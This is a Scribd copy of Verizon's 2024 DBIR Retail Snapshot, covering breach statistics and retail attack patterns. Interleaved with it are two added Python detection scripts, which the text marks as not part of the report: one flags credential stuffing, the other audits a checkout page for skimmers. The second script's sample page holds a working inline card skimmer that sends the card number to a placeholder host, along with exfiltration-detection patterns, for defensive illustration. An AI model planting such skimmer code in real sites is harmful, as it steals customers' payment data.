Verizon 2024 DBIR Retail Snapshot

The 2024 Data Breach Investigations Report highlights a significant increase in breaches that began with the exploitation of vulnerabilities, largely driven by ransomware and extortion actors; ransomware and other extortion techniques together now account for 32% of all breaches. The report also emphasizes the human element, which was a component of 68% of breaches, and identifies phishing as a major threat, with the median user falling for a phishing email in under 60 seconds. Additionally, the report outlines the incident classification patterns and shows that System Intrusion, Social Engineering and Basic Web Application Attacks dominate breaches in the retail sector.

Uploaded by

regis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
54 views14 pages

Verizon 2024-Dbir-Retail-Snapshot

The 2024 Data Breach Investigations Report highlights a significant increase in breaches due to the exploitation of vulnerabilities, particularly through ransomware and extortion techniques, which now account for 32% of all breaches. The report also emphasizes the human element in breaches, with 68% of incidents involving human error, and identifies phishing as a major threat, with users falling for phishing emails in under 60 seconds on average. Additionally, the report outlines various incident classification patterns, revealing that social engineering and basic web application attacks are prevalent in the retail sector.

Uploaded by

regis
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 14

2024 Data Breach Investigations Report
Retail Snapshot

[Cover graphic. Ways-in labels: Phishing, Exploit vulnerabilities, Credentials. Action vector labels: Desktop sharing, Email, VPN, Web applications.]

About the cover
This year, the report is delving deeper
into the pathway to breaches in an effort
to identify the most likely Action and
vector groupings that lead to breaches
given the current threat landscape. The
cracked doorway on the cover is meant
to represent the various ways attackers
can make their way inside. The opening
in the door shows the pattern of our
combined “ways-in” percentages (see
Figure 7 of the full report for a more
straightforward representation), and
it lets out a band of light displaying a
pattern of the Action vector quantities.
The inner cover highlights and labels
the quantities in a less abstract way.
Hope you enjoy our art house phase.
Table of contents

Welcome 5

Summary of findings 6

Incident Classification Patterns 9

Insights for Retail 12

2024 Data Breach Investigations Report Retail Snapshot 4


Welcome
Hello, and welcome to the Verizon Data Breach Investigations
Report (DBIR) Retail Snapshot.

The DBIR aims to provide security professionals with an in-depth analysis of data-driven, real-world instances of cybercrime and how cyberattacks play out across organizations of different sizes as well as from different verticals and disparate geographic locations. We hope that by doing so, we can provide you with insight into what particular threats your organization is most likely to face and thereby help prepare you to handle them in the best possible manner.

As in past years, we will examine what our data has to tell us about threat actors and the tools they employ against enterprises. This year, we analyzed 30,458 real-world security incidents, of which 10,626 were confirmed data breaches (a record high!), with victims spanning 94 countries.

This data represents actual, real-world breaches and incidents investigated by the Verizon Threat Research Advisory Center (VTRAC) or provided to us by one of our global contributors without whose generous help this document could not be produced. We hope you can use this report and the information it contains to increase your awareness of the most common tactics used against organizations at large and your specific industry. It offers strategies to help protect your company and its assets. Read the full report for a more detailed view of the threats you may face today at verizon.com/dbir.

30,458 security incidents investigated
10,626 confirmed breaches

About the 2024 DBIR incident dataset

Each year, the DBIR timeline for in-scope incidents is from November 1 of one calendar year through October 31 of the next calendar year. Thus, the incidents described in this year’s report took place between November 1, 2022, and October 31, 2023. The 2023 caseload is the primary analytical focus of the 2024 report, but the entire range of data is referenced throughout, notably in trending graphs. The time between the latter date and the date of publication for the report is spent in acquiring the data from our global contributors, anonymizing and aggregating that data, analyzing the dataset, and finally creating the graphics and writing the report.

Industry labels

In the DBIR, we align with the North American Industry Classification System (NAICS) standard to categorize the victim organizations in our corpus. The standard uses two- to six-digit codes to classify businesses and organizations. Our analysis is typically done at the two-digit level, and we will specify NAICS codes along with an industry label. For example, a chart with a label of Retail (NAICS 44–45) is not indicative of 44–45 as a value. “44–45” is the code for the Retail Trade sector. Detailed information on the codes and the classification system is available here: https://www.census.gov/naics/?58967?yearbck=2012

This snapshot highlights important takeaways for the Retail Trade (NAICS 44–45) sector, which includes establishments primarily engaged in retailing merchandise generally without transformation and rendering services incidental to the sale of merchandise.



Summary of findings

They’re exploiting our vulnerabilities.

Our ways-in analysis witnessed a substantial growth of attacks involving the exploitation of vulnerabilities as the critical path to initiate a breach when compared to previous years—almost tripling (180% increase) from last year. This was largely due to the effect of MOVEit and similar zero-day vulnerabilities, primarily leveraged by ransomware and other extortion-related threat actors using Web applications as their initial entry points.

Figure 1. Select ways-in enumerations in non-Error, non-Misuse breaches (n=6,963)

Ransomware and Extortion are significant threats.

Roughly one-third of all breaches involved Ransomware or some other Extortion technique. Pure Extortion attacks have risen over the past year and are now a component of 9% of all breaches. Ransomware actors have moved toward these newer techniques, resulting in a bit of a decline in Ransomware to 23%. However, when combined, they represent a strong growth to 32% of breaches. Additionally, Ransomware was a top threat across 92% of industries.

Figure 2. Ransomware and Extortion breaches over time



We’ve identified the most common ways in.

We have revised our calculation of the human element in breaches to exclude malicious Privilege Misuse to provide a clearer metric of what security awareness can impact. For this year’s dataset, the human element was a component of 68% of breaches, roughly the same as the previous period described in the 2023 DBIR.

In this issue, we are introducing an expanded concept of a breach involving a third party to include partner infrastructure being affected and direct or indirect software supply chain issues—including when an organization is affected by vulnerabilities in third-party software. In short, these are the breaches an organization could potentially mitigate or prevent by trying to select vendors with better security track records. We see this figure at 15% this year, a 68% increase from the previous year, mostly fueled by the use of zero-day exploits for Ransomware and Extortion attacks.

Our dataset saw a growth of breaches involving Errors, now at 28%, as we broadened our contributor base to include several new mandatory breach notification entities. This validates our suspicion that errors are more prevalent than media or traditional incident response–driven bias would have us believe.

Figure 3. Select key enumerations in breaches



Falling for Phishing happens fast.

The overall reporting rate of Phishing has been growing over the past few years. In security awareness exercise data contributed by our partners during 2023, 20% of users reported phishing in simulation engagements, and 11% of the users who clicked the email also reported. This is welcome news because the median time to click on a malicious link after the email is opened is 21 seconds and then only another 28 seconds for the person caught in the phishing scheme to enter their data. This leads to an alarming finding: The median time for users to fall for phishing emails is less than 60 seconds.

Figure 4. Phishing email report rate by click status

They go where the money is.

Financially motivated threat actors will typically stick to the attack techniques that give them the most return on investment.

Over the past three years, the combination of Ransomware and other Extortion breaches has accounted for almost two-thirds (fluctuating between 59% and 66%) of those attacks. According to the FBI’s Internet Crime Complaint Center (IC3) ransomware complaint data, the median loss associated with the combination of Ransomware and other Extortion breaches has been $46,000, ranging between $3 (three dollars) and $1,141,467 for 95% of cases. We also found from ransomware negotiation data contributors that the median ratio of initially requested ransom and company revenue is 1.34%, but it fluctuated between 0.13% and 8.3% for 80% of the cases.

Similarly, over the past two years, we have seen incidents involving Pretexting (the majority of which had Business Email Compromise [BEC] as the outcome) accounting for one-fourth (ranging between 24% and 25%) of financially motivated attacks. In both years, the median transaction amount of a BEC was around $50,000.

Figure 5. Select action varieties in Financial motive over time



Incident Classification Patterns

The DBIR first introduced the Incident Classification Patterns in 2014 as a useful shorthand for scenarios that occurred very frequently. In 2022, due to changes in attack type and the threat landscape, we revamped and enhanced those patterns, moving from nine to eight—the seven you see in this report and the Everything Else “pattern,” which is a catch-all for incidents that don’t fit within the orderly confines of the other patterns.

These patterns are based on an elegant machine-learning clustering process, equipped to better capture complex interaction rules, and they are much more focused on what happens during the breach. That makes them better suited for control recommendations, too.

Here are our key findings for each pattern:

System Intrusion

These are complex attacks that leverage malware and/or hacking to achieve their objectives, including deploying ransomware.

Ransomware attacks continue to drive the growth of this pattern as they now account for 23% of all breaches and 70% of the incidents within System Intrusion.

• Ransomware (or some type of Extortion) appears in 92% of industries as one of the top threats.
• Analyzing the FBI Internet Crime Complaint Center dataset this year, we found that the median adjusted loss (after law enforcement worked to try to recover funds) for those who did pay was around $46,000.
• Traditional Ransomware’s prevalence declined slightly to 23%. However, roughly one-third (32%) of all breaches involved some type of Extortion technique, including Ransomware. The meteoric growth of Extortion attacks made this combined threat stand out in our dataset.

Social Engineering

This attack involves the psychological compromise of a person that alters their behavior into taking an action or breaching confidentiality.

More than 40% of incidents involved Pretexting, and 31% involved Phishing. Other tried-and-true tactics include attacks coming in via email, text and websites.

• Phishing and Pretexting via email continue to be the leading cause of incidents in this sector, accounting for 73% of breaches.
• The median time for users to fall for phishing emails is less than 60 seconds.
• More than 20% of users identified and reported phishing per engagement, including 11% of the users who did click the email.
• Over the past two years, roughly one-fourth (between 24% and 25%) of financially motivated incidents involved Pretexting, the majority of which resulted in a Business Email Compromise (BEC). In both years, the median transaction amount of a BEC was around $50,000.1

1. According to the FBI’s Internet Crime Complaint Center ransomware complaint data



Basic Web Application Attacks

These attacks are against a web application, and after the initial compromise, they do not have a large number of additional Actions. It is the “get in, get the data and get out” pattern.

Financially motivated external actors continue to target credentials and personal information.

• Over the past 10 years, stolen credentials have appeared in almost one-third (31%) of breaches.
• Our dataset shows just over 8% of breaches in the Basic Web Application Attacks pattern.
• After examining postings from marketplaces dedicated to selling and reselling credentials and cookies collected from password stealers, we found that 65% of these credentials were posted for sale on criminal forums less than one day from when they were collected.
• There is no substantial difference between large organizations (55%) and small organizations (47%) in the Basic Web Application Attacks pattern.
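The “get in, get the data and get out” pattern described above usually begins with stolen credentials being replayed against a login form. As an added illustration (not part of the DBIR and not Verizon’s code), the following Python script flags credential stuffing in constructed web login log lines: one source address trying many distinct usernames inside a short window with mostly failures, while a single user retrying their own password is left alone. The log format, addresses, usernames and thresholds are assumptions made for this example.

```python
"""Flag credential stuffing in web login logs.

Added example; not from the DBIR or Verizon. The log format, addresses,
usernames and thresholds below are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> ip=<addr> user=<name> result=ok|fail"
LINE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<res>ok|fail)$"
)


def parse_login_lines(lines):
    """Yield (timestamp, ip, user, result); malformed lines are skipped, not fatal."""
    for raw in lines:
        m = LINE.match(raw.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["res"]


def detect_stuffing(lines, window=timedelta(minutes=5), min_users=5, min_fail_ratio=0.8):
    """Return {ip: summary} for sources that, within any sliding window, tried at
    least min_users distinct usernames with at least min_fail_ratio failures.

    A single user retrying their own password never trips this: they only
    contribute one distinct username, however many attempts they make.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, res in parse_login_lines(lines):
        by_ip[ip].append((ts, user, res))

    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until every event fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            win = events[start:end + 1]
            users = {u for _, u, _ in win}
            failures = sum(1 for _, _, r in win if r == "fail")
            if len(users) >= min_users and failures / len(win) >= min_fail_ratio:
                summary = {
                    "users": len(users),
                    "attempts": len(win),
                    "failures": failures,
                    # Accounts the attacker actually got into: reset these first.
                    "hits": sorted({u for _, u, r in win if r == "ok"}),
                }
                # Keep the widest view of the attack seen for this source.
                if ip not in alerts or summary["users"] > alerts[ip]["users"]:
                    alerts[ip] = summary
    return alerts


# Constructed sample: 203.0.113.7 sprays seven accounts in five seconds and gets
# one password right; 198.51.100.2 is one user mistyping their own password.
SAMPLE_LOG = """\
2024-03-01T10:00:01 ip=203.0.113.7 user=alice result=fail
2024-03-01T10:00:02 ip=203.0.113.7 user=bob result=fail
2024-03-01T10:00:02 ip=203.0.113.7 user=carol result=fail
2024-03-01T10:00:03 ip=203.0.113.7 user=dave result=fail
2024-03-01T10:00:03 ip=203.0.113.7 user=erin result=ok
2024-03-01T10:00:04 ip=203.0.113.7 user=frank result=fail
2024-03-01T10:00:05 ip=203.0.113.7 user=grace result=fail
2024-03-01T10:01:00 ip=198.51.100.2 user=alice result=fail
2024-03-01T10:01:30 ip=198.51.100.2 user=alice result=fail
2024-03-01T10:02:00 ip=198.51.100.2 user=alice result=ok
""".splitlines()

if __name__ == "__main__":
    for ip, s in detect_stuffing(SAMPLE_LOG).items():
        print(f"{ip}: {s['users']} users / {s['attempts']} attempts, "
              f"{s['failures']} failures, compromised: {s['hits']}")
```

The distinct-username count is what separates stuffing from a forgotten password; the failure ratio keeps a shared corporate egress address with many legitimate logins from alerting. The “hits” list is the actionable output: those are the accounts whose credentials were already on a list, so they need a reset and a token revocation, not just a lockout of the source address.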

Miscellaneous Errors

Incidents where unintentional actions directly compromised a security attribute of an information asset fall into this pattern. This does not include lost devices, which are grouped with theft instead.

More than 50% of errors were the result of Misdelivery, continuing last year’s trend, while other errors, such as Disposal, are declining.

• Misconfiguration is the next most common error and was seen in approximately 10% of breaches.
• Classification errors, Publishing errors and Gaffes (verbal slips) are all relatively tightly packed in order of mention. Disposal errors continue to decline ever so slightly (as has been the general trend for the last several years) and accounted for just over 1% of the cases in this pattern.
• End-users now account for 87% of errors, emphasizing the need for universal error-catching controls across industries.

Denial of Service

These attacks are intended to compromise the availability of networks and systems. This includes both network and application layer attacks.

Denial of Service is responsible for more than 50% of incidents analyzed this year.

• Our ongoing analysis of content delivery network (CDN)-monitored, web application-focused Denial of Service attacks shows that even though the median attack size has reduced slightly from 2.2 gigabits per second (Gbps) to 1.6 Gbps, the 97.5th percentile of those attacks increased to 170 Gbps from the previous high of 124 Gbps.
• Subject matter experts (SMEs) continue to report the growth of low-volume, persistent attacks on high-interaction services such as Domain Name System (DNS).



Lost and Stolen Assets

Incidents where an information asset went missing, whether through misplacement or malice, are grouped into this pattern.

Devices are still much more likely to be lost than stolen. Laptops continue to be a risk for loss in particular.

• This year we saw a higher percentage of incidents involving Assets in this pattern causing confirmed data breaches, with last year showing about 8% confirmed breaches and this year showing a surprising 91%.

Privilege Misuse

These incidents are predominantly driven by unapproved or malicious use of legitimate privileges.

In our prior report, we saw collusion—multiple actors working in concert to achieve the goal of the breach—at 7%, which, while nowhere near the highs we saw back in 2019, was still a surprise. This year, things seem to have gone back to normal, and we are seeing collusion dropping to less than 1% of breaches.

• Employees are largely taking Personal data—this is likely about taking customers’ information.
• Internal actors are again largely working on their own in this pattern. The Financial motivation remains in ascension, while Espionage is a distant second. Personal data is still the main targeted data type.
• We saw Internal data show a bit of a spike this year as well, which would include sensitive plans and intellectual property that would attract the Espionage-motivated employee.
• Finally, Banking data is remaining mostly steady over time as a targeted data type.

Table 1. Incident Classification Patterns key findings



Retail
NAICS 44–45

Frequency: 725 incidents, 369 with confirmed data disclosure

Top patterns: System Intrusion, Social Engineering and Basic Web Application Attacks represent 92% of breaches

Threat actors: External (96%), Internal (4%) (breaches)

Actor motives: Financial (99%), Espionage (1%) (breaches)

Data compromised: Credentials (38%), Other (31%), Payment (25%), System (20%) (breaches)

What is the same? The three attack patterns not only remained consistent but are even in the same ranked order as last year. Threat actors with a Financial motivation continue to target this sector.

The Retail sector is where we often find “Magecart” threat actors. They are particularly skilled at inserting malicious code into the e-commerce sites of retail entities to siphon off (usually) Payment card information. We saw roughly the same percentage of these kinds of attacks this year as we did last year (Figure 6). However, the type of data being compromised showed a surprising change.

With Credentials standing at 38% (very close to last year’s 35%) we didn’t expect to see Payment card data drop to 25% (from 37%). Now, we understand how attractive and useful Credentials are to your average threat actor, but we were stunned to see Payment card data, so useful for immediate fraud, drop so precipitously (Figure 7). As we have indicated before, we get the “what” of the changes in the data, but we do not always get the “why.” Is this a result of increased controls around the monetization of payment card data, making it harder for the criminals to use the data they have stolen? Or is it just that credentials are so much easier to steal? Either way, we will be interested to see if this is just a blip on the radar or an actual trend starting.

Figure 6. Top patterns over time in Retail industry breaches (series labelled: Social Engineering, Basic Web Application Attacks)
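Magecart-style skimming, as described above, works by getting a script onto the checkout page that reads the card fields and sends their contents to a host the attacker controls. As an added example (not from the DBIR and not Verizon’s code), this Python script audits a constructed checkout page for three indicators a practitioner would check: external scripts loaded from origins outside an allowlist, approved third-party scripts served without Subresource Integrity, and inline scripts that both reference card fields and make a network send. The hostnames, allowlist, field names and sample page are assumptions; the checks are heuristics, not proof of compromise.

```python
"""Audit a checkout page for Magecart-style skimmer indicators.

Added example; not from the DBIR or Verizon. Hostnames, allowlist, field
names and the sample page are assumptions. The checks are heuristics.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: first-party and approved third-party origins for the shop's scripts.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.payments.example"}

# A skimmer has to read the card fields and then send them somewhere.
CARD_FIELDS = re.compile(r"\b(card[_-]?number|cvv|cvc|expiry|expiration)\b", re.I)
EXFIL = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=)", re.I)


class ScriptCollector(HTMLParser):
    """Collect (src, has_integrity) for external scripts and bodies of inline ones."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (severity, message) findings; an empty list means nothing was flagged."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, has_sri in parser.external:
        host = urlparse(src).hostname or ""  # relative src -> "" (first party)
        if host and host not in allowed_hosts:
            findings.append(("high", f"script from unapproved origin: {src}"))
        elif host and not has_sri:
            findings.append(("medium", f"approved script without SRI: {src}"))
    for body in parser.inline:
        if CARD_FIELDS.search(body) and EXFIL.search(body):
            findings.append(("high", "inline script reads card fields and sends data out"))
    return findings


# Constructed checkout page: one pinned script, one approved but unpinned script,
# one from an unknown origin, and an inline skimmer that beacons the card number.
SAMPLE_PAGE = """<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://js.payments.example/v1/sdk.js"></script>
<script src="https://static-analytics.example/a.js"></script>
<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var c = document.querySelector("[name=card_number]").value;
  new Image().src = "https://static-analytics.example/p?c=" + encodeURIComponent(c);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for severity, message in audit_checkout_page(SAMPLE_PAGE):
        print(f"[{severity}] {message}")
```

The same three indicators map onto browser-enforced controls: a Content Security Policy whose script-src lists only the approved origins blocks the unknown host outright, and an integrity attribute on each approved third-party script makes the browser refuse a file that has been tampered with upstream. The inline-script check is the weakest of the three, since a skimmer can obfuscate its field and send calls, which is why a script audit like this belongs alongside CSP reporting rather than in place of it.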

Summary
While this industry is usually the
place where we see Payment card
data stolen, the focus of the threat
actors has shifted to Credentials.
Pretexting is also increasing, while
Phishing has dropped. Denial of
Service attacks remain a problem
for Retail organizations, causing
disruption to their ability to serve
their customers and make sales.



In social-related breaches, Pretexting has emerged triumphant over Phishing as the top social action. It is good to see that the threat actors were required to step up their game to successfully influence their chosen targets. Dare we hope it is because people are becoming better educated and thus able to resist the run-of-the-mill phishing efforts? A suspicious user community is a well-protected user community.

With regard to incidents, Denial of Service continues to represent a serious problem. While these attacks rarely result in confirmed data breaches, they do come with potentially serious disruption of the organization’s ability to function. We also saw Ransomware-related incidents continue to decline as they have since 2021.

Figure 7. Top Confidentiality data varieties in Retail industry breaches (n=341)



Stay informed
and threat ready.
Facing today’s threats requires intelligence from an authoritative
source of cybersecurity breach information.
The full DBIR contains details on the actors, actions and patterns that
can help you prepare your defenses and educate your organization.
Read the full 2024 DBIR at verizon.com/dbir.

Questions? Comments? Concerns? Love to share cute pet pictures?
Let us know! Send us a note at dbir@verizon.com, find us on LinkedIn, tweet @VerizonBusiness with #dbir. Got a data question? Tweet @VZDBIR!

If your organization aggregates incident or security data and is interested in becoming a contributor to the annual Verizon DBIR (and we hope you are), the process is very easy and straightforward. Please email us at dbircontributor@verizon.com.

© 2024 Verizon. OGREP4040624

